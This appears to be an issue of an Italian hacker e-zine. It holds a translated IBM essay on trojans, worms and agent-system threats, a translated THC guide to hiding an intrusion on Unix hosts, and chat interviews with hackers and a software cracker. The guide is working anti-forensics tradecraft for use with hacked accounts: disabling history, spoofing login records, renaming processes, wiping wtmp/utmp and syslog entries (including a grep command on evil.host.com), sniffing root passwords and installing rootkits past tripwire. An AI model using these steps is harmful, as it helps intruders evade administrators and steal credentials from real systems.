²°°ÛÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛ°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛÛ°ÛÛ°°°ÛÛ°ÛÛ°°°²
²°°°°°ÛÛÛ°°°°ÛÛ²²²ÛÛ°°°°ÛÛÛ°°°°Û²ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛÛ°°ÛÛ°ÛÛ²²ÛÛ°ÛÛÛ°°ÛÛ°°°°°°²
²°°°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛ°°°ÛÛ²ÛÛ°°°Û²²ÛÛ°ÛÛ°°ÛÛ°°°°ÛÛÛ°°°°ÛÛ°ÛÛ²²ÛÛ°ÛÛÛÛ°ÛÛ°ÛÛ°°°²
²°°°°°ÛÛÛ°°°°ÛÛ°°Û°°°°ÛÛÛÛÛÛÛ°°Û²ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°°°°ÛÛ°ÛÛ²²ÛÛ°ÛÛ°ÛÛÛÛ°ÛÛ°°°²
²°°°°°ÛÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°°°°°ÛÛ°ÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛÛ°ÛÛ°°ÛÛÛ°ÛÛ°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TROJAN HORSES, VIRUSES AND WORMS (tradotto da Wurz) ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Le cose in cui andiamo a sbattere nella Rete

Questo e' un breve sguardo a qualcuno dei piu' pittoreschi personaggi nel
serraglio delle minacce alla sicurezza in rete, con un'enfasi su come sono
in relazione con i sistemi agent-based. Il gruppo Sistemi di Distribuzione
di Massa alla IBM Research ha condotto ricerche in queste ed in altre cose
emergenti riguardo ai sistemi di distribuzione del futuro.
----------------------------------------------------------------------------

Trojan horses [cavalli di Troia]

Un Trojan e' un programma che fa qualcosa che il programmatore vuole, ma che
l'utente non approverebbe se lo sapesse prima. Poiche' molti sistemi di
sicurezza correnti sono basati principalmente su privilegi user-level
piuttosto che su privilegi program-level, qualsiasi programma che TU puoi
lanciare puo' leggere qualsiasi cosa cui TU hai accesso in lettura,
scrivere su qualsiasi cosa cui TU hai accesso in scrittura, ed eseguire
qualsiasi programma o comando che TU sei autorizzato ad eseguire.

Un Trojan nascosto in un qualsiasi programma di gioco scaricato dal tuo
newsgroup preferito puo' leggere qualsiasi file su cui hai accesso, e
spedirlo ovunque nel mondo. Puo' cancellare o introdurre qualche byte
nei file su cui puoi scrivere. Puo' mandare messaggi osceni alla Casa Bianca,
o postare cose imbarazzanti a dei newsgroup a caso.

E puo' copiare se stesso in qualsiasi programma su cui hai accessi in
scrittura (vedi Viruses & Worms piu' sotto).

In un sistema mobile-agent, e' critico assicurare che gli agents siano
eseguiti in un ambiente controllato, e che siano capaci di fare solo cose
che sono stati autorizzati a fare.
Gli agents devono essere fidati solo per quello che la meno fidata entita'
possa essere capace di alterare il programma o lo stato interno dell'agent.
----------------------------------------------------------------------------

Viruses and Worms

Un virus e' un programma (di solito un trojan) che si diffonde, facendo copie
di se stesso in un modo o nell'altro. Nell'ambiente dei microcomputer, i
virus generalmente si diffondono scrivendo copie di se stessi in altri
programmi, o nei boot records di dischi e dischetti. (Per maggiori
informazioni sui virus nei PC compatibili, guarda all'IBM Computer
Virus Information Center)

Un worm in un ambiente di rete e' generalmente un programma autosufficiente
che si diffonde generando copie di se stesso in altri ospiti nella rete.
Un famoso worm ha causato grande scompiglio su Internet nel 1988. Non c'e'
grande differenza tra virus e worm; in generale, se l'entita' diffondentesi
e' un programma autosufficiente, sara' chiamato worm, mentre se si nasconde
dentro altri programmi o codici boot sara' chiamato virus.

Puo' un virus diffondersi tra gli agents in un sistema mobile-agent? Finora
sembra che non ci sia nessuna ragione particolare per permettere ad un
agent di alterare il codice di un altro agent gia' esistente. Se
l'infrastruttura dell'agent non lo permette, nessun virus sarebbe capace
di diffondersi da un agent all'altro. D'altra parte, se per caso o apposta
l'infrastruttura permette ad un agent di alterarne un altro, sarebbero
possibili i virus inter-agent.

Sono possibili i worms nei sistemi mobile-agent? Se un agent puo' crearne
un altro, esiste la possibilita' di scatenare una riproduzione worm. La
riproduzione di agent deve essere controllata in un modo o nell'altro, per
limitarne la possibilita'; se gli agents possono creare altri agents, devono
essere affidati ad una distribuzione povera, o limitati in quanto grande
possa essere la loro discendenza, o altrimenti potranno avere figli e nipoti
senza alcun limite.
----------------------------------------------------------------------------

Flash Crowds

Il termine flash crowd e' stato inizialmente usato da Larry Niven, in un
breve racconto fantascientifico. Nella storia, il teletrasporto locale
economico e' divenuto possibile; ora, i siti con attraenti nuove storie
sono istantaneamente inondati da ficcanaso teletrasportatisi.

Come i sistemi divengono piu' interconnessi e piu' potenti, abbiamo
l'equivalente del teletrasporto economico; se un sito Web e' riconosciuto
come particolarmente interessante, la sua curva di contatti puo' divenire
esponenziale, causando strozzature della rete e crash dei server. In
una rete di agents, un vasto numero di agents similmente programmati, come
un orda di programmi di mercato similmente programmati puo' causare un
crash dei mercati, cosi' possono causare congestione di rete e sovraccarico
dei server. E se tutti gli agents adottano simili strategie di ripiego in
caso di sovraccarico, la flash crowd puo' migrare da server a server sulla
rete, portando ad impetuosi sovraccarichi di difficile rimedio.
----------------------------------------------------------------------------

Weeds, Freeloaders, Flying Dutchmen e Zombies

Un weed [erbaccia] e' un programma (o qualsiasi altro in un sistema) che non
fa niente di male, e che usa una cosi' piccola quantita' di risorse che non ci
da' fastidio. In seguito pero' comincia ad accumularsi, e bisogna usare le
forbici. O l'erbicida.

Un freeloader e' un programma che, per sopravvivere e possibilmente aiutare
il suo creatore, usa le risorse di un sistema o di un server senza pagarle.
I server possono fornire dei servizi minimi gratis per attirare dei clienti
o, non intenzionalmente, come effetto non voluto di complesse strutture di
prezzo; ci possono essere molti modi per fare in modo che molti addebiti,
specialmente quelli piccoli, si perdano nel casino. Un freeloader sfrutta
queste cose per operare senza pagare.

Chiamato come il leggendario vascello fantasma, un Flying Dutchman [olandese
volante] e' un freeloader che riesce a diventare veramente immortale, senza
pagare per le risorse necessarie a sopravvivere. Un Flying Dutchman puo'
muoversi da un ospite all'altro, senza mai usare abbastanza risorse da essere
ucciso; puo' generare una copia di se stesso in un altro ospite proprio prima
di essere terminato, assicurando una discendenza senza fine.

Uno Zombie e' simile al Flying Dutchman; e' un programma che e' stato terminato,
ma continua lo stesso a consumare risorse, a causa di ritardi (qualche volta
infiniti) nel pulire tutte le risorse associate ad esso. Gli zombies possono
talvolta avere abbastanza risorse per una vera elaborazione; piu' spesso,
esistono solo come i non-morti proprietari di vario tipo di spazio.

Un singolo programma freeloader o immortale in se' non danneggia un sistema,
ed anticipiamo che un tipico sistema agent-based puo' tollerare un basso
livello di freeloading. Come analogia ai negozi fisici, che tollerano un
certo numero di persone venute a ripararsi dalla pioggia, nella speranza che
possano eventualmente comprare qualcosa.

Incontrollati, un gran numero di weeds possono sprecare grandi quantita' di
risorse di sistema; i sistemi hanno il bisogno di monitorare quest'attivita',
e di imporre l'ordine se sfugge al controllo. Richieste da conosciuti
freeloaders possono essere fatte pagare, perfino in caso siano normalmente
gratuite. Un processo di monitoraggio intelligente puo' essere necessario per
identificare e terminare programmi immortali, intenzionali od occasionali,
che non abbiano alcuno scopo utile. Altri tipi di weeds richiedono
indubbiamente altri tipi di soluzioni; l'inaspettato e' piacevole.
----------------------------------------------------------------------------

I soliti sospetti

Cosi' come queste nuove e in qualche modo speculative minacce, molti
dei problemi di sicurezza tradizionali, come controllo di accesso basico,
autenticazione, crittazione sicura, ecc., si applicano alla sicurezza della
rete e degli agent: IBM Research ha molti altri progetti relativi alla
sicurezza.
----------------------------------------------------------------------------
David Chess, chess@watson.ibm.com
Thanks to Gene Spafford at Purdue, whose talk "Viruses, Worms, and Things
that go Bump in the Net" may have inspired the title for this page; tricky
things, replicators!

[tradotto da WURZ]

NOTA DI N0bodY88 = diamo un benvenuto al NewBies Staff al primo tarduttore di
sempre del nostro Staff, in questo "capitolo" appariranno ogni
mese le sue traduzioni, o i suoi articoli, a seconda di come
scegliera' di andare avanti :)

PS: un tnx da parte di tutti quelli che l'inglese x intanto non se lo vogliono
studiare o che lo studiano ma hanno qualke problemino, tnx 1000 Wurz!!!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³A HACKER [by Van Hauser of THC (=The Hackers Choice)](tradotto da Wurz)³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Autore: Van Hauser/THC
Traduttore: WURZ - Freedom Fighter
[WURZ says: molte definizioni le ho lasciate in lingua originale, sia
perche' si capiscono di piu' e velocemente (es.: shell = conchiglia),
sia perche' "suonano" meglio (es.: sysadmin = amministratore di sistema)]

I. IL PRIMO COMANDO

Il primo comando che devi inviare dopo essersi registrati con un
account hackerato e' quello di una shell differente da quella di login
in cui si sta al momento lavorando. Lo scopo e' quello di disabilitare
la cronologia dei comandi inviati mentre si sta hackando. Un check
cronologico da parte del vero utente o del sysadmin rivela la tua
presenza e cio' che hai fatto!! Se stai facendo funzionare un CSH
allora esegui uno SH e viceversa.

$ <- questo e' un prompt SH
% <- questo e' un prompt CSH

Se non assomiglia ai prompt standard sopra descritti, allora
esegui SH. Se il prompt rimane uguale, digita "exit" ed esegui
il CSH ... La ragione per usare queste due shells e non bash, ksh,
zsh, ecc. e' che queste due sono semplicemente senza opzioni extra
abilitate per default (come la cronologia).

II. METODO LASTLOG

Se vedi un testo tipo "Last successful login from alpha.master.mil"
quando ti logghi con un account hackato e

  
non puoi hackare la root o
non vuoi disgregare i system logs cancellando i dati, allora esegui
il seguente : "rlogin" e se necessario inserisci nuovamente la
password dell'account hackato. Dopo aver visto il prompt digita "exit"
per tornare ancora. Questo cambiera' l'header "Last login from ..." ecc.
in "localhost" che e' molto meno sospettoso di "site.real.user.never.saw.com".
Naturalmente hai bisogno di fare questo solo se il tuo host d'origine
puo' attirare l'attenzione per l'utente e/o il sysadmin.

III. METODO CHI

Dopo aver completato i passi I e II digita "w" ...vedrai tutti gli
attuali utenti online... con l'indirizzo da cui si sono loggati.
Ancora una volta qualcosa come il tuo host d'origine OLANDESE sara'
molto sospettoso agli utenti e/o al root se il sito si trova negli
STATI UNITI. Se non puoi hackare la root o ancora una volta non vuoi
manomettere i files di log puoi provare un bug che funziona ancora
anche per molti unix aggiornati: basta eseguire "login" con la stessa
login+password. Digita nuovamente "w" e, se ha funzionato, la tua
origine sara' cambiata in qualcosa come "tty05". Naturalmente hai
bisogno di fare cio' solo se il tuo host d'origine puo' attirare
l'attenzione degli altri utenti e/o del sysadmin.

IV. ESEGUIRE PROGRAMMI

Non eseguire programmi con nomi sospetti ...ISS e YPX sono per esempio
molto sospetti, ed un admin capace sa quello che sta succedendo se vede
un utente che sta usando "loadmodule SandraBullok" sul suo Sun... ;-).
Puoi sia copiare e rinominare i comandi sia usare i sources che
cambiano il nome del comando nella lista d'elaborazione. A proposito,
la lista d'elaborazione puo' essere testata da "ps -ef" o "ps -auxwww" e
il comando attuale che ogni utente sta eseguendo con "w" e la maggior
parte delle elaborazioni CPU con "top" ...cosi' e' veramente facile
monitorare i programmi che l'utente(i) sta usando.

V. ESEGUIRE TELNET

Ci sono solo due cose che dovrebbero essere dette riguardo all'uso di
telnet per scopi hacker (per esempio fare un telnet al prossimo target).
Innanzitutto MAI digitare "telnet target.host.com". Digitare "telnet"
e poi "open target.host.com" che non sara' visualizzato come parametro
nella lista d'elaborazione. La seconda cosa e' che certi clients telnet
esportano variabili ambientali. E se il tuo hack e' scoperto e possono
rintracciare la connessione fino al tuo host originario, possono pure
avere l'account che hai usato sul tuo host originario. Cosi' ridefinisci
(in qualsiasi cosa tu voglia) le seguenti variabili ambientali prima di
cominciare telnet, rlogin o simili: USER, LOGNAME, UID, HOME, MAIL - forse
dovresti fare anche un "cd /tmp" per cambiare la variabile PWD... Per
cambiare queste variabili:

SH : <variabile>=<nuovo_valore>;export <variabile>
esempio: USER=nobody;export USER
CSH: setenv <variabile> <nuovo_valore>
esempio: setenv USER nobody

e non dimenticare di resettare le variabili dopo aver telnettato se
vuoi fare qualcosa con l'account prima di fare log out.

VI. RIMUOVERE I TUOI FILES

Quando hai fatto la tua impresa - con o senza successo - cancellala
immediatamente dopo averla provata - specialmente se li hai provati
in /tmp! Nulla e' piu' interessante che curiosare nella directory /tmp
per vedere cio' che gli altri utenti stanno facendo... Se veramente hai
bisogno di lavorare nella directory temp (perche' SUID si e' infilato
nella tua home dir) allora crea una directory come ".X11", e dalle
l'abilitazione 711. Ricorda, se qualcuno curiosa nelle directory
mentre stai hackando, o perdi la connessione e non puoi piu' re-loggarti
oppure dimenticane perche' sei in guai grossi.

--> ! I seguenti 2 punti sono possibili solo con un accesso root ! <--

VII. MODIFICARE I LOGS

Importanti files di log sono LASTLOG, WTMP e UTMP. Se hai avuto
successo a hackare la root allora dovresti modificarli. Di solito
possono essere trovati in /etc, /var/adm o /var/log ...dipende, prova
le pagine principali.

Quali tools dovresti usare? ZAP (o ZAP2) e' carino, ma NON ti cancella
dai logs, bensi' sovrascrive i contenuti con zeri. CERT ha gia'
pubblicato dei tools che testano facilmente i logs per questi
contenuti sovrascritti. E nulla piu' di questo urla "Hey, c'e' un hacker
con accesso root nel sistema" in faccia al sysadmin. Importante per
ZAP: controlla il percorso per i logs definito nei sources! Prova
CLOAK2 che puo' cambiare la data d'importanti campi di dati ;-) ma non
compila su tutti i tipi do OS unix. Puoi pure provare CLEAR, incluso
in questa rivista [WURZ says: sfiga, dovete cercarlo da un'altra
parte ;-)], che cancella VERAMENTE gli entries... ;-)

VIII. SYSLOG & LASTCOMM

Dovresti pure cercare nel logfile di messaggi syslog se forse vi sono
contenute le entries con il tuo account hackato o il tuo host
originario. Di solito e' localizzato in /var/adm o in /var/log
...generalmente e' chiamato "messages" ma puo' essere diverso - e cerca
anche altri logfiles generati da messaggi auth.* e authpriv.* (e
naturalmente xferlog ecc.). Cerca il file /etc/syslog.conf per vedere
il file giusto e prova cos'e' loggato con quel file/programma/mail/utente.

Se vedi qualcosa come "@loghost" e scopri il tuo host d'origine nel
file messages allora hai un problema. E' pure loggato ad un altro sito
che per la maggior parte del tempo non e' accessibile da remoto. Ma
prova ad installare uno sniffer (vedi la sezione IX!) e guarda se un
root riesce a fare un login al loghost - allora avrai pure la password
per quell'host e potrai gestire il problema ;-). Per esempio, per
rimuovere il tuo hostname dal logfile "messages" esegui:
"grep -v evil.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages"

LASTCOMM (dalla accton ecc.) e' un tool per loggare tutti i comandi
eseguiti, con una flag se il file eseguito aveva settata la flag SUID
e se un comando e' stato eseguito da root. Puoi trovare questo logfile
nella stessa directory del file syslog. E' veramente un tool cattivo
verso gli hackers ma - fortuna! - la maggior parte delle volte non e'
installato. Ma ora non devi piu' averne paura :-) Procurati l'eccellente
ACCT Cleaner di Zhart e prova la liberta' ;-)

IX. INSTALLARE TROJANS

Quando installi uno sniffer, ricorda che chiunque puo' eseguire
"ifconfig -a" per vedere se la scheda e' in modo promiscuo. Prendi un
rootkit per il tuo OS unix e sostituiscilo. Esegui fixer.c su di esso
per il corretto checksum e data/orario ma prova prima il tuo account
root se forse tripwire o altri checker binari sono installati!
Ricordati di cio' per ogni binario che sostituisci. Se il tuo binario
e' in una directory che e' montata su una NFS e non puo' essere
rimontata in write mode, allora devi prima hackare l'host NFS - a
volte la vita non e' facile ;-)

X. FINE

Spero ti sia divertito ed abbia imparato qualcosa da questo testo.
Per aggiornamenti, tips, trucchi, ecc., mandami un'e-mail a mc@thc.net.

Ricorda: mai impigrirti. Ogni cosa deve essere fatta al 100% - o
affronta le conseguenze.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°ÛÛ°ÛÛ°°°°ÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°ÛÛ°°°°°°°ÛÛ°ÛÛ°ÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛ°²
²°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ²²²ÛÛ°°ÛÛ°°°°°ÛÛ°°ÛÛ°ÛÛ°°°°°°°°°ÛÛ°°°°ÛÛ°°°°°°²
²°ÛÛ°ÛÛ°ÛÛ°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°°°ÛÛ°°°ÛÛ°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°°°²
²°ÛÛ°ÛÛ°°ÛÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°ÛÛ°°°°°°ÛÛ°ÛÛ°°°°ÛÛ°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°²
²°ÛÛ°ÛÛ°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛ°°ÛÛÛ°°°°°ÛÛÛ°°°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛÛÛ°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹ INTERVISTA A UN HACKER/PHREAKER ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

<N0bodY88> Che computer hai avuto nella tua vita?
<SoulDestroy> Commodore Vic16 , Vic20 , C64 , C128 , Apple IIC , 8086 , 286 ,
<SoulDestroy> 386 , P90,
<SoulDestroy> P166 Piu' lo spectrum e Amiga 500-600-1200 ...
<N0bodY88> Quando hai iniziato ad appassionarti oltre ai giochi sulla
<N0bodY88> sicurezza, reti e doppini?
<SoulDestroy> Verso i 10 anni o giu' di li , complice un mio caro amico che
<SoulDestroy> viveva facendo reti e smanettava sul telefono per hobby...
<N0bodY88> Sei mai stato preso/bustato/binato?
<SoulDestroy> Si' , per la storia delle BBS che davano software pirata , ma la
<SoulDestroy> mia bbs di software pirata non ne aveva...
<SoulDestroy> A parte quel piccolo dettaglio , mi sono stati messi i sigilli
<SoulDestroy> a tutto quello che c'era attaccato al computer , compreso il
<SoulDestroy> telefono di servizio del modem....
<N0bodY88> Di che gruppo hai fatto parte?
<SoulDestroy> Nessuno , mai gruppi ma solo amici che si riunivano e parlavano,
<SoulDestroy> l'idea del gruppo non e' mai emersa...
<N0bodY88> Di cosa ti interessi principalmente?
<SoulDestroy> Tutto e nulla , da customizzare windows a Linux , dall'uso di VB
<SoulDestroy> a come riciclare un 486 per farlo diventare proxy ...
<SoulDestroy> N'somma , smanetto su tutto , faccio un sacco di cose e spesso
<SoulDestroy> imbrocco anke la soluzione giusta....
<N0bodY88> Cosa ti da' + soddisfazione ora nella vita (diventare root o
<N0bodY88> trombare...hihihi)?
<SoulDestroy> Se sono solo , propenderei per il root , se sono con la ragazza,
<SoulDestroy> trombare .....
<SoulDestroy> Se poi (e un giorno provo,,,,) divento root trombando mi sa che
<SoulDestroy> e' il massimo....
<N0bodY88> hihihi si potrebbe dire di avere "goduto" diventando root! hihihi
<N0bodY88> Quali sistemi conosci?
<SoulDestroy> Dos , Win , Linux , ed ho una buona base di Iris
<N0bodY88> <HIHIHI>Ci diresti cosa mangi/bevi/fai di sport/guardi alla tv/ x
<N0bodY88> sapere come farci diventare tutti hacker?</HIHIHI>
<SoulDestroy> Mangio dolci in quantita' pressoche' industirale , bevo acqua e
<SoulDestroy> lemon shwepps, come sport non faccio nulla (ma se trombare e'
<SoulDestroy> uno sport...) la tv ho smesso di guardarla da 3 anni circa, mi
<SoulDestroy> annoiava essere passivo , il pc era meglio...
<SoulDestroy> Per diventare hacker bisogna passare un bel pokino di tempo a
<SoulDestroy> studiare , poi provare in locale , poi avere amici che studiano
<SoulDestroy> come te e confrontarsi spesso con loro ...
<N0bodY88> So che tu fumi (si parla di sigarette...l'articoletto sul negozio
<N0bodY88> L'erba voglio di Spinellone ci sara' in un prox numero...hihihi),
<N0bodY88> ma quanto?
<SoulDestroy> Quando non sono al computer fumo poco , se sono dietro al
<SoulDestroy> monitor non mi accorgo di avere una sigaretta accesa, infatti
<SoulDestroy> ormai la mia tastiera e' piu' carica di cenere che i miei
<SoulDestroy> posacenere....
<N0bodY88> E oltre al pc , che hobby hai ?
<SoulDestroy> La musica , adoro il metal ..
<SoulDestroy> E poi ho il cb e mi diverto da matti con gli amici , tutti
<SoulDestroy> davanti al pc , tutti con la radio accesa ed il microfono in
<SoulDestroy> mano....
<N0bodY88> Adesso io devo stakkare
<N0bodY88> Ci risentiamo cmq okki?
<SoulDestroy> ok a presto allora :)
<N0bodY88> Come intervista credo che possa andare bene.. voi che ne dite?

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹ INTERVISTA A UN EX CRACKER ORA HACKER ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

<N0bodY88> Allora che ne dici di cominciare?
<DaVinci> ehehehh
<N0bodY88> quando ti sei appassionato ai computer?
<DaVinci> avevo circa 11 anni
<DaVinci> ed ero in possesso del mio primo computer
<DaVinci> un commodore 64
<DaVinci> :-))))
<N0bodY88> mitico!!!
<N0bodY88> hai cominciato subito a programmare o prima giocavi?
<DaVinci> i giochi non mi attiravano tanto
<DaVinci> almeno in quel momento
<DaVinci> usavo il computer solo per conoscere qualche programmino
<DaVinci> cercavo di capire come potesse funzionare
<DaVinci> ripeto che avevo solo 11 anni
<N0bodY88> hai cominciato tardi eh...hihihi
<N0bodY88> fin da subito ti appassiono' il computer?
<DaVinci> ero curioso
<DaVinci> no, i primi due anni
<DaVinci> li passai a rovistare all'interno del commodore
<DaVinci> ehehhe
<DaVinci> dopo due anni
<DaVinci> ho iniziato a conoscere un certo Bombadil
<DaVinci> li pero' avevo gia' un 486
<DaVinci> con un modem da 2400
<DaVinci> eheeh
<DaVinci> sembra un museo
<N0bodY88> hihihi
<DaVinci> mi collegavo alla BBS di Pier
<DaVinci> dove c'era pure Master
<N0bodY88> Master? ah si' forse ne ho sentito parlare hihihi
<DaVinci> che io non conoscevo
<DaVinci> da li si cominciava a capire che c'era un mondo
<DaVinci> molto simpatico dove imparare
<N0bodY88> ma le cose che + ti colpirono cosa furono?
<DaVinci> le bbs
<DaVinci> erano un libro universale
<DaVinci> dove trovavi informazioni e prg di ogni genere
<DaVinci> non conoscevo ancora fidonet e itapac
<N0bodY88> quali furono i tuoi primi amici in rete, ti ricordi i nomi?
<DaVinci> si
<DaVinci> c'era Maverick
<DaVinci> Hackerjack
<DaVinci> tuttora mio amico
<DaVinci> e altri che ancora non ricordo
<DaVinci> Maverick era di Pisa
<DaVinci> Hackerjack di Bs
<DaVinci> bazzicavo pure la BBs di DragonFly
<N0bodY88> ma il salto dall'usare i pc x programmare/giocare/leggere
<N0bodY88> all'usarli x fare cracking/phreaking/hacking quando avvenne + o -?
<DaVinci> 10 anni fa'
<N0bodY88> o chi ti convinse
<DaVinci> non mi convinse nessuno
<DaVinci> un giorno mi misi a giocare con un giochino stupido
<DaVinci> e non riuscivo a passare un livello
<DaVinci> allora ho cercato di capire come potevo bypassarlo
<DaVinci> fu cosi' che provai a smontarlo
<DaVinci> e cercai di capire dove e come iniziava a bloccarmi
<N0bodY88> mitico! e ci riuscisti?
<DaVinci> usando un programmino che adesso sinceramente non ricordo
<DaVinci> l'ho crakkato in tre giorni
<DaVinci> ci passavo circa 4/5 ore a giorno
<N0bodY88> il tuo primo crack vero?
<DaVinci> si
<DaVinci> e' stato bellissimo
<DaVinci> :-))
<DaVinci> era come riuscire a mettere una bandierina sulla vetta di una
<DaVinci> montagna sconosciuta a tutti
<DaVinci> e' dall'ora
<DaVinci> che ho iniziato a smontare prog e giochi
<DaVinci> poi quando e' uscito Softice
<DaVinci> tutto si e' reso piu' semplice
<DaVinci> caricavi il programma
<DaVinci> e quando si bloccava per il numero seriale
<DaVinci> o per richiesta di password
<DaVinci> entravo in softice
<DaVinci> e li iniziava il lavoro di salti
<DaVinci> ehehehe
<N0bodY88> eheheh
<N0bodY88> ma lo facevi x passione, x sfida, x soldi
<N0bodY88> qual'era il motivo principale?
<DaVinci> no, non per soldi
<DaVinci> era uno stimolo a dover per forza riuscire a liberare un prog
<DaVinci> dal vincolo delle seriali
<DaVinci> o password
<DaVinci> il nick Misha
<DaVinci> era gia' presente ancora quando crakkavo
<DaVinci> perche' non potevo mettere il mio vecchio nick
<DaVinci> se tu per caso fai una ricerca su astalavista
<DaVinci> e digiti Misha
<DaVinci> te ne rendi conto
<DaVinci> molti prog
<DaVinci> sono stati crakkati
<DaVinci> perche' quando entrai nei Pc
<DaVinci> c'era un motto
<DaVinci> riuscire a crakkare determinati programmi
<DaVinci> solo dopo ti facevano entrare
<DaVinci> era come una prova
<N0bodY88> una specie di iniziazzione
<DaVinci> si
<DaVinci> ma non solo
<DaVinci> loro si studiano il metodo che tu hai usato
<DaVinci> e cercano di capire se c'era un'altro modo per poterlo fare
<DaVinci> solo dopo ti convocavano
<DaVinci> e ti davano la "benedizione"
<DaVinci> :-)))
<N0bodY88> tu in quanti e quali gruppi sei stato?
<DaVinci> a parte i PC
<DaVinci> ero negli Angelz
<DaVinci> non so se li hai sentiti ancora
<DaVinci> il quartier generale era in inghilterra
<DaVinci> ma ci sono stato solo pochi mesi
<DaVinci> loro crakkavano per scopo di lucro
